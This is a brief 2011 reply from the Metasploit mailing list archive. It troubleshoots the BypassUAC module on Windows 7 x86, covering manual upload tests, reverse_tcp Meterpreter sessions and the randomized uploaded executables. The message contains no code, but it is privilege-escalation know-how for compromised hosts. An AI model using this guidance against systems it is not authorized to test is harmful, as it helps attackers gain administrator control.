Metasploit mailing list archives

Re: BypassUAC not working against Windows 7 x86

From: Drforbin <drforbin6 () gmail com>
Date: Sun, 04 Dec 2011 03:20:57 -0500

sorry about missing last part...
Have you tried manually uploading to make sure uploading works?
The firewall stuff is not important because have a meterpreter session.
Your using reverse_tcp I assume?
it should try and upload bypassuac-x64.exe or bypassuac-x86.exe and a meterpreter exe.
the file names will be randomized..

drforbin